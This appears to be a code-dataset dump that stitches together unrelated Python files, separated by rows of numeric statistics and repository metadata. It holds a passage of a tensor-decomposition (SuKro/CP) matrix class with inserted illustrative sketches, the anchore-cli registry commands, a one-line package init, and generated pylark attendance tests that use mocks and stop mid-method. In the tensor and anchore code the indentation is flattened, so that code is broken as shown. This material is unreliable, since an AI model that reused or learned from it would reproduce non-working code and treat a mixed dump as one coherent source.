tensor_shape = n_matrices + tuple([n*m for n, m in zip(tensorized_row_shape, tensorized_column_shape)])
rank = tl.cp_tensor.validate_cp_rank(tensor_shape, rank)
if len(tensor_shape)==2: # rank cannot exceed matrix dimensions when using SVD
rank = min(rank, max(tensor_shape))
# Register the parameters
weights = nn.Parameter(torch.Tensor(rank))
# Avoid the issues with ParameterList
factors = [nn.Parameter(torch.Tensor(s, rank)) for s in tensor_shape]
return cls(weights, factors, tensorized_row_shape, tensorized_column_shape, rank=rank, n_matrices=n_matrices)
@classmethod
def from_tensor(cls, tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), init='random', **kwargs):
# tensor is supposed to be already rearranged
n_matrices = _ensure_tuple(n_matrices)
rank = tl.cp_tensor.validate_cp_rank(n_matrices + tensorized_row_shape + tensorized_column_shape, rank)
with torch.no_grad():
weights, factors = parafac(tensor, rank, **kwargs)
weights = nn.Parameter(weights)
factors = [nn.Parameter(f) for f in factors]
return cls(weights, factors, tensorized_row_shape, tensorized_column_shape, rank, n_matrices)
@classmethod
def from_matrix(cls, matrix, tensorized_row_shape, tensorized_column_shape, rank, **kwargs):
if matrix.ndim > 2:
n_matrices = _ensure_tuple(tl.shape(matrix)[:-2])
else:
n_matrices = ()
tensor = rearrange(matrix, tensorized_row_shape, tensorized_column_shape, n_matrices)
return cls.from_tensor(tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices, **kwargs)
def init_from_tensor(self, tensor, **kwargs):
#tensor is supposed to be already rearranged
with torch.no_grad():
weights, factors = parafac(tensor, self.rank, **kwargs)
self.weights = nn.Parameter(weights)
self.factors = FactorList([nn.Parameter(f) for f in factors])
return self
def init_from_matrix(self, matrix, **kwargs):
tensor = rearrange(matrix, self.tensorized_row_shape, self.tensorized_column_shape, self.n_matrices)
return self.init_from_tensor(tensor, **kwargs)
@property
def decomposition(self):
return self.weights, self.factors
def to_tensor(self):
return tl.cp_to_tensor(self.decomposition)
def to_matrix(self):
# TODO: create sukro_to_matrix in tensorly, similar to tt_matrix_to_matrix or cp_to_tensor?
# There are two ways to implement this:
# 1) Inverse rearrangement of the resulting CP tensor (implemented below)
# 2) Matricizing the columns of the CP factors and summing their weighted Kronecker products
#    (a hedged sketch of this variant is given after the class)
tensor = tl.cp_to_tensor(self.decomposition)
return rearrange_inv(tensor, self.tensorized_row_shape, self.tensorized_column_shape, self.n_matrices)
def normal_(self, mean=0, std=1):
super().normal_(mean, std)
std_factors = (std/math.sqrt(self.rank))**(1/self.order)
with torch.no_grad():
self.weights.fill_(1)
for factor in self.factors:
factor.data.normal_(0, std_factors)
return self
def __getitem__(self, indices):
if isinstance(indices, int):
# Select one dimension of one mode
mixing_factor, *factors = self.factors
weights = self.weights*mixing_factor[indices, :]
return self.__class__(weights, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
elif isinstance(indices, slice):
# Index part of a factor
mixing_factor, *factors = self.factors
factors = [mixing_factor[indices], *factors]
weights = self.weights
return self.__class__(weights, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
else:
# Index multiple dimensions
factors = self.factors
index_factors = []
weights = self.weights
for index in indices:
if index is Ellipsis:
raise ValueError(f'Ellipsis is not yet supported, yet got indices={indices} which contains one.')
mixing_factor, *factors = factors
if isinstance(index, int):
if factors or index_factors:
weights = weights*mixing_factor[index, :]
else:
# No factors left
return tl.sum(weights*mixing_factor[index, :])
else:
index_factors.append(mixing_factor[index])
return self.__class__(weights, index_factors+factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[len(indices):])
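# --- Hedged sketches (added for illustration; not part of the original module) ---
# (a) The alternative to_matrix() path mentioned inside the class above: matricize column r
# of each CP factor back to (tensorized_row_shape[k], tensorized_column_shape[k]) -- mirroring
# the row-major reshape used by `rearrange` -- and sum the weighted Kronecker products.
# Assumes no batch dimension (n_matrices == ()).
def _sukro_to_matrix_via_kron(weights, factors, row_shape, col_shape):
    out = None
    for r in range(len(weights)):
        term = weights[r] * torch.ones(1, 1)
        for k, factor in enumerate(factors):
            block = factor[:, r].reshape(row_shape[k], col_shape[k])
            term = torch.kron(term, block)
        out = term if out is None else out + term
    return out

# (b) End-to-end usage sketch: approximate an 8x15 matrix as a sum of `rank` Kronecker
# products of 2x3 and 4x5 blocks. Shapes and rank here are made-up example values.
def _sukro_example(rank=4):
    M = torch.randn(8, 15)
    sukro = SuKroMatrix.from_matrix(M, tensorized_row_shape=(2, 4),
                                    tensorized_column_shape=(3, 5), rank=rank)
    M_hat = sukro.to_matrix()
    return torch.norm(M - M_hat) / torch.norm(M)  # relative approximation error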
| 43.216578
| 160
| 0.62176
| 4,001
| 32,326
| 4.773807
| 0.066483
| 0.07445
| 0.091414
| 0.085026
| 0.815812
| 0.794555
| 0.770471
| 0.752565
| 0.72801
| 0.718115
| 0
| 0.006377
| 0.277238
| 32,326
| 748
| 161
| 43.216578
| 0.81112
| 0.070995
| 0
| 0.728597
| 0
| 0.001821
| 0.024301
| 0.002206
| 0
| 0
| 0
| 0
| 0.003643
| 1
| 0.102004
| false
| 0
| 0.016393
| 0.016393
| 0.258652
| 0.003643
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cd57eedefda5f227cb6de1983a7db0cba49ab3d
| 7,483
|
py
|
Python
|
anchorecli/cli/registry.py
|
PeteGoo/anchore-cli
|
b833540750a7c5e0f0e4892b4825ccda606f4020
|
[
"Apache-2.0"
] | 1
|
2018-09-17T12:01:22.000Z
|
2018-09-17T12:01:22.000Z
|
anchorecli/cli/registry.py
|
LuksJobs/anchore-cli
|
b833540750a7c5e0f0e4892b4825ccda606f4020
|
[
"Apache-2.0"
] | null | null | null |
anchorecli/cli/registry.py
|
LuksJobs/anchore-cli
|
b833540750a7c5e0f0e4892b4825ccda606f4020
|
[
"Apache-2.0"
] | null | null | null |
import sys
import os
import re
import json
import click
import anchorecli.clients.apiexternal
config = {}
@click.group(name='registry', short_help='Registry operations')
@click.pass_obj
def registry(ctx_config):
global config
config = ctx_config
try:
anchorecli.cli.utils.check_access(config)
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry', {}, err))
sys.exit(2)
@registry.command(name='add', short_help="Add a registry")
@click.argument('registry', nargs=1, required=True)
@click.argument('registry_user', nargs=1, required=True)
@click.argument('registry_pass', nargs=1, required=True)
@click.option('--insecure', is_flag=True, default=False, help="Allow connection to registry without SSL cert checks (ex: if registry uses a self-signed SSL certificate)")
@click.option('--registry-type', help="Specify the registry type (default='docker_v2')")
@click.option('--skip-validate', is_flag=True, help="Do not attempt to validate registry/creds on registry add")
def add(registry, registry_user, registry_pass, insecure, registry_type, skip_validate):
"""
REGISTRY: Full hostname/port of registry. Eg. myrepo.example.com:5000
REGISTRY_USER: Username
REGISTRY_PASS: Password
"""
ecode = 0
registry_types = ['docker_v2', 'awsecr']
try:
if registry_type and registry_type not in registry_types:
raise Exception ("input registry type not supported (supported registry_types: " + str(registry_types))
#try to detect awsecr registry of form <accid>.dkr.ecr.<region>.amazonaws.com
if not registry_type:
if re.match("[0-9]+\.dkr\.ecr\..*\.amazonaws\.com", registry):
sys.stderr.write("WARN: setting registry type to 'awsecr' based on form of input registry name, remove and re-add using '--registry-type docker_v2' to override\n")
registry_type = "awsecr"
else:
registry_type = "docker_v2"
# do some input string checking
if re.match(".*\/.*", registry):
raise Exception("input registry name cannot contain '/' characters - valid registry names are of the form <host>:<port> where :<port> is optional")
ret = anchorecli.clients.apiexternal.add_registry(config, registry=registry, registry_user=registry_user, registry_pass=registry_pass, registry_type=registry_type, insecure=insecure, validate=(not skip_validate))
ecode = anchorecli.cli.utils.get_ecode(ret)
if ret['success']:
print(anchorecli.cli.utils.format_output(config, 'registry_add', {}, ret['payload']))
else:
raise Exception( json.dumps(ret['error'], indent=4))
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry_add', {}, err))
if not ecode:
ecode = 2
anchorecli.cli.utils.doexit(ecode)
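# Hedged illustration (added; not part of the anchore-cli commands): the auto-detection in
# `add` above treats hostnames of the form <account-id>.dkr.ecr.<region>.amazonaws.com as
# ECR registries and everything else as plain docker_v2. Example inputs are made up.
def _detect_registry_type(registry):
    if re.match(r"[0-9]+\.dkr\.ecr\..*\.amazonaws\.com", registry):
        return "awsecr"
    return "docker_v2"
# e.g. _detect_registry_type("123456789012.dkr.ecr.us-east-1.amazonaws.com") == "awsecr"
#      _detect_registry_type("myrepo.example.com:5000") == "docker_v2"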
@registry.command(name='update', short_help="Update an existing registry")
@click.argument('registry', nargs=1, required=True)
@click.argument('registry_user', nargs=1, required=True)
@click.argument('registry_pass', nargs=1, required=True)
@click.option('--insecure', is_flag=True, default=False, help="Allow connection to registry without SSL cert checks (ex: if registry uses a self-signed SSL certificate)")
@click.option('--registry-type', default='docker_v2', help="Specify the registry type (default='docker_v2')")
@click.option('--skip-validate', is_flag=True, help="Do not attempt to validate registry/creds on registry add")
def upd(registry, registry_user, registry_pass, insecure, registry_type, skip_validate):
"""
REGISTRY: Full hostname/port of registry. Eg. myrepo.example.com:5000
REGISTRY_USER: Username
REGISTRY_PASS: Password
"""
ecode = 0
try:
# do some input string checking
if re.match(".*\/.*", registry):
raise Exception("input registry name cannot contain '/' characters - valid registry names are of the form <host>:<port> where :<port> is optional")
ret = anchorecli.clients.apiexternal.update_registry(config, registry=registry, registry_user=registry_user, registry_pass=registry_pass, registry_type=registry_type, insecure=insecure, validate=(not skip_validate))
ecode = anchorecli.cli.utils.get_ecode(ret)
if ret['success']:
print(anchorecli.cli.utils.format_output(config, 'registry_update', {}, ret['payload']))
else:
raise Exception( json.dumps(ret['error'], indent=4))
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry_update', {}, err))
if not ecode:
ecode = 2
anchorecli.cli.utils.doexit(ecode)
@registry.command(name='del', short_help="Delete a registry")
@click.argument('registry', nargs=1, required=True)
def delete(registry):
"""
REGISTRY: Full hostname/port of registry. Eg. myrepo.example.com:5000
"""
ecode = 0
try:
# do some input string checking
if re.match(".*\/.*", registry):
raise Exception("input registry name cannot contain '/' characters - valid registry names are of the form <host>:<port> where :<port> is optional")
ret = anchorecli.clients.apiexternal.delete_registry(config, registry)
ecode = anchorecli.cli.utils.get_ecode(ret)
if ret['success']:
print(anchorecli.cli.utils.format_output(config, 'registry_delete', {}, ret['payload']))
else:
raise Exception( json.dumps(ret['error'], indent=4))
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry_delete', {}, err))
if not ecode:
ecode = 2
anchorecli.cli.utils.doexit(ecode)
@registry.command(name='list', short_help="List all current registries")
def registrylist():
ecode = 0
try:
ret = anchorecli.clients.apiexternal.get_registry(config)
ecode = anchorecli.cli.utils.get_ecode(ret)
if ret['success']:
print(anchorecli.cli.utils.format_output(config, 'registry_list', {}, ret['payload']))
else:
raise Exception( json.dumps(ret['error'], indent=4))
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry_list', {}, err))
if not ecode:
ecode = 2
anchorecli.cli.utils.doexit(ecode)
@registry.command(name='get', short_help="Get a registry")
@click.argument('registry', nargs=1, required=True)
def get(registry):
"""
REGISTRY: Full hostname/port of registry. Eg. myrepo.example.com:5000
"""
ecode = 0
try:
# do some input string checking
if re.match(".*\/.*", registry):
raise Exception("input registry name cannot contain '/' characters - valid registry names are of the form <host>:<port> where :<port> is optional")
ret = anchorecli.clients.apiexternal.get_registry(config, registry=registry)
ecode = anchorecli.cli.utils.get_ecode(ret)
if ret['success']:
print(anchorecli.cli.utils.format_output(config, 'registry_get', {}, ret['payload']))
else:
raise Exception( json.dumps(ret['error'], indent=4))
except Exception as err:
print(anchorecli.cli.utils.format_error_output(config, 'registry_get', {}, err))
if not ecode:
ecode = 2
anchorecli.cli.utils.doexit(ecode)
| 42.276836
| 223
| 0.675932
| 948
| 7,483
| 5.234177
| 0.155063
| 0.057638
| 0.079807
| 0.050988
| 0.811165
| 0.808142
| 0.808142
| 0.795042
| 0.795042
| 0.794841
| 0
| 0.007981
| 0.196312
| 7,483
| 176
| 224
| 42.517045
| 0.817093
| 0.076974
| 0
| 0.593496
| 0
| 0.056911
| 0.260659
| 0.011429
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0.056911
| 0.04878
| 0
| 0.097561
| 0.089431
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1cf37a4070df1e59f74713639d6db1191b62053d
| 35
|
py
|
Python
|
run_on_gce/__init__.py
|
odiak/run-on-gce
|
b6fcd4630bef8af01c2aa0a04ef3769a38d1376f
|
[
"MIT"
] | 2
|
2020-08-28T08:34:18.000Z
|
2020-08-28T09:36:20.000Z
|
run_on_gce/__init__.py
|
odiak/run-on-gce
|
b6fcd4630bef8af01c2aa0a04ef3769a38d1376f
|
[
"MIT"
] | null | null | null |
run_on_gce/__init__.py
|
odiak/run-on-gce
|
b6fcd4630bef8af01c2aa0a04ef3769a38d1376f
|
[
"MIT"
] | null | null | null |
from .run_on_gce import run_on_gce
| 17.5
| 34
| 0.857143
| 8
| 35
| 3.25
| 0.625
| 0.384615
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1cf5141e3bfff2ec4b0a85cfcd6054fbea17bb02
| 42,069
|
py
|
Python
|
tests/test_attendance_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | 7
|
2021-08-18T00:42:05.000Z
|
2022-03-14T09:49:15.000Z
|
tests/test_attendance_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | null | null | null |
tests/test_attendance_sample.py
|
chyroc/pylark
|
a54cce6b814935fd3c72668b262b54c8ee461484
|
[
"Apache-2.0"
] | 1
|
2022-03-14T09:49:20.000Z
|
2022-03-14T09:49:20.000Z
|
# Code generated by lark_sdk_gen. DO NOT EDIT.
import unittest
import pylark
import pytest
from tests.test_conf import app_all_permission, app_no_permission
from tests.test_helper import mock_get_tenant_access_token_failed
def mock(*args, **kwargs):
raise pylark.PyLarkError(scope="scope", func="func", code=1, msg="mock-failed")
def mock_raw_request(*args, **kwargs):
raise pylark.PyLarkError(
scope="scope", func="func", code=1, msg="mock-raw-request-failed"
)
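# Hedged illustration (added; not produced by lark_sdk_gen): the two stubs above raise
# pylark.PyLarkError with distinct `msg` values so the test classes below can tell which
# layer was replaced (a client method vs. the underlying raw_request call). For example:
def _example_stub_usage():
    with pytest.raises(pylark.PyLarkError) as e:
        mock()
    assert "mock-failed" in f"{e}"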
# mock get token
class TestAttendanceSampleMockGetTokenFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestAttendanceSampleMockGetTokenFailed, self).__init__(*args, **kwargs)
self.cli = app_all_permission.ins()
self.cli.auth.get_tenant_access_token = mock_get_tenant_access_token_failed
self.cli.auth.get_app_access_token = mock_get_tenant_access_token_failed
self.module_cli = self.cli.attendance
def test_mock_get_token_download_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.download_attendance_file(pylark.DownloadAttendanceFileReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_upload_attendance_file(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.upload_attendance_file(pylark.UploadAttendanceFileReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_query_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.query_attendance_user_settings(
pylark.QueryAttendanceUserSettingsReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_update_attendance_user_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_settings(
pylark.UpdateAttendanceUserSettingsReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_create_update_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_group(
pylark.CreateUpdateAttendanceGroupReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_delete_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_group(pylark.DeleteAttendanceGroupReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_group(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_group(pylark.GetAttendanceGroupReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_create_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_shift(pylark.CreateAttendanceShiftReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_delete_attendance_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_shift(pylark.DeleteAttendanceShiftReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_shift_by_id(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_id(
pylark.GetAttendanceShiftByIDReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_shift_by_name(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_name(
pylark.GetAttendanceShiftByNameReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_statistics_data(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_data(
pylark.GetAttendanceStatisticsDataReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_statistics_header(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_header(
pylark.GetAttendanceStatisticsHeaderReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_update_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_statistics_settings(
pylark.UpdateAttendanceUserStatisticsSettingsReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_statistics_settings(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_statistics_settings(
pylark.GetAttendanceUserStatisticsSettingsReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_daily_shift(
pylark.GetAttendanceUserDailyShiftReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_task(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task(pylark.GetAttendanceUserTaskReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_flow(pylark.GetAttendanceUserFlowReq())
assert "msg=failed" in f"{e}"
def test_mock_get_token_batch_get_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_get_attendance_user_flow(
pylark.BatchGetAttendanceUserFlowReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_batch_create_attendance_user_flow(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_create_attendance_user_flow(
pylark.BatchCreateAttendanceUserFlowReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_task_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task_remedy(
pylark.GetAttendanceUserTaskRemedyReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_create_update_attendance_user_daily_shift(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_user_daily_shift(
pylark.CreateUpdateAttendanceUserDailyShiftReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_approval(
pylark.GetAttendanceUserApprovalReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_create_attendance_user_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_user_approval(
pylark.CreateAttendanceUserApprovalReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_get_attendance_user_allowed_remedy(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_allowed_remedy(
pylark.GetAttendanceUserAllowedRemedyReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_init_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.init_attendance_remedy_approval(
pylark.InitAttendanceRemedyApprovalReq()
)
assert "msg=failed" in f"{e}"
def test_mock_get_token_update_attendance_remedy_approval(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_remedy_approval(
pylark.UpdateAttendanceRemedyApprovalReq()
)
assert "msg=failed" in f"{e}"
# mock self func
class TestAttendanceSampleMockSelfFuncFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestAttendanceSampleMockSelfFuncFailed, self).__init__(*args, **kwargs)
self.cli = app_all_permission.ins()
self.module_cli = self.cli.attendance
def test_mock_self_func_download_attendance_file(self):
origin_func = self.module_cli.download_attendance_file
self.module_cli.download_attendance_file = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.download_attendance_file(pylark.DownloadAttendanceFileReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.download_attendance_file = origin_func
def test_mock_self_func_upload_attendance_file(self):
origin_func = self.module_cli.upload_attendance_file
self.module_cli.upload_attendance_file = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.upload_attendance_file(pylark.UploadAttendanceFileReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.upload_attendance_file = origin_func
def test_mock_self_func_query_attendance_user_settings(self):
origin_func = self.module_cli.query_attendance_user_settings
self.module_cli.query_attendance_user_settings = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.query_attendance_user_settings(
pylark.QueryAttendanceUserSettingsReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.query_attendance_user_settings = origin_func
def test_mock_self_func_update_attendance_user_settings(self):
origin_func = self.module_cli.update_attendance_user_settings
self.module_cli.update_attendance_user_settings = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_settings(
pylark.UpdateAttendanceUserSettingsReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.update_attendance_user_settings = origin_func
def test_mock_self_func_create_update_attendance_group(self):
origin_func = self.module_cli.create_update_attendance_group
self.module_cli.create_update_attendance_group = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_update_attendance_group(
pylark.CreateUpdateAttendanceGroupReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_update_attendance_group = origin_func
def test_mock_self_func_delete_attendance_group(self):
origin_func = self.module_cli.delete_attendance_group
self.module_cli.delete_attendance_group = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_group(pylark.DeleteAttendanceGroupReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.delete_attendance_group = origin_func
def test_mock_self_func_get_attendance_group(self):
origin_func = self.module_cli.get_attendance_group
self.module_cli.get_attendance_group = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_group(pylark.GetAttendanceGroupReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_group = origin_func
def test_mock_self_func_create_attendance_shift(self):
origin_func = self.module_cli.create_attendance_shift
self.module_cli.create_attendance_shift = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_attendance_shift(pylark.CreateAttendanceShiftReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_attendance_shift = origin_func
def test_mock_self_func_delete_attendance_shift(self):
origin_func = self.module_cli.delete_attendance_shift
self.module_cli.delete_attendance_shift = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.delete_attendance_shift(pylark.DeleteAttendanceShiftReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.delete_attendance_shift = origin_func
def test_mock_self_func_get_attendance_shift_by_id(self):
origin_func = self.module_cli.get_attendance_shift_by_id
self.module_cli.get_attendance_shift_by_id = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_id(
pylark.GetAttendanceShiftByIDReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_shift_by_id = origin_func
def test_mock_self_func_get_attendance_shift_by_name(self):
origin_func = self.module_cli.get_attendance_shift_by_name
self.module_cli.get_attendance_shift_by_name = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_shift_by_name(
pylark.GetAttendanceShiftByNameReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_shift_by_name = origin_func
def test_mock_self_func_get_attendance_statistics_data(self):
origin_func = self.module_cli.get_attendance_statistics_data
self.module_cli.get_attendance_statistics_data = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_data(
pylark.GetAttendanceStatisticsDataReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_statistics_data = origin_func
def test_mock_self_func_get_attendance_statistics_header(self):
origin_func = self.module_cli.get_attendance_statistics_header
self.module_cli.get_attendance_statistics_header = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_statistics_header(
pylark.GetAttendanceStatisticsHeaderReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_statistics_header = origin_func
def test_mock_self_func_update_attendance_user_statistics_settings(self):
origin_func = self.module_cli.update_attendance_user_statistics_settings
self.module_cli.update_attendance_user_statistics_settings = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_attendance_user_statistics_settings(
pylark.UpdateAttendanceUserStatisticsSettingsReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.update_attendance_user_statistics_settings = origin_func
def test_mock_self_func_get_attendance_user_statistics_settings(self):
origin_func = self.module_cli.get_attendance_user_statistics_settings
self.module_cli.get_attendance_user_statistics_settings = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_statistics_settings(
pylark.GetAttendanceUserStatisticsSettingsReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_statistics_settings = origin_func
def test_mock_self_func_get_attendance_user_daily_shift(self):
origin_func = self.module_cli.get_attendance_user_daily_shift
self.module_cli.get_attendance_user_daily_shift = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_daily_shift(
pylark.GetAttendanceUserDailyShiftReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_daily_shift = origin_func
def test_mock_self_func_get_attendance_user_task(self):
origin_func = self.module_cli.get_attendance_user_task
self.module_cli.get_attendance_user_task = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task(pylark.GetAttendanceUserTaskReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_task = origin_func
def test_mock_self_func_get_attendance_user_flow(self):
origin_func = self.module_cli.get_attendance_user_flow
self.module_cli.get_attendance_user_flow = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_flow(pylark.GetAttendanceUserFlowReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_flow = origin_func
def test_mock_self_func_batch_get_attendance_user_flow(self):
origin_func = self.module_cli.batch_get_attendance_user_flow
self.module_cli.batch_get_attendance_user_flow = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_get_attendance_user_flow(
pylark.BatchGetAttendanceUserFlowReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.batch_get_attendance_user_flow = origin_func
def test_mock_self_func_batch_create_attendance_user_flow(self):
origin_func = self.module_cli.batch_create_attendance_user_flow
self.module_cli.batch_create_attendance_user_flow = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.batch_create_attendance_user_flow(
pylark.BatchCreateAttendanceUserFlowReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.batch_create_attendance_user_flow = origin_func
def test_mock_self_func_get_attendance_user_task_remedy(self):
origin_func = self.module_cli.get_attendance_user_task_remedy
self.module_cli.get_attendance_user_task_remedy = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_attendance_user_task_remedy(
pylark.GetAttendanceUserTaskRemedyReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_attendance_user_task_remedy = origin_func
def test_mock_self_func_create_update_attendance_user_daily_shift(self):
origin_func = self.module_cli.create_update_attendance_user_daily_shift
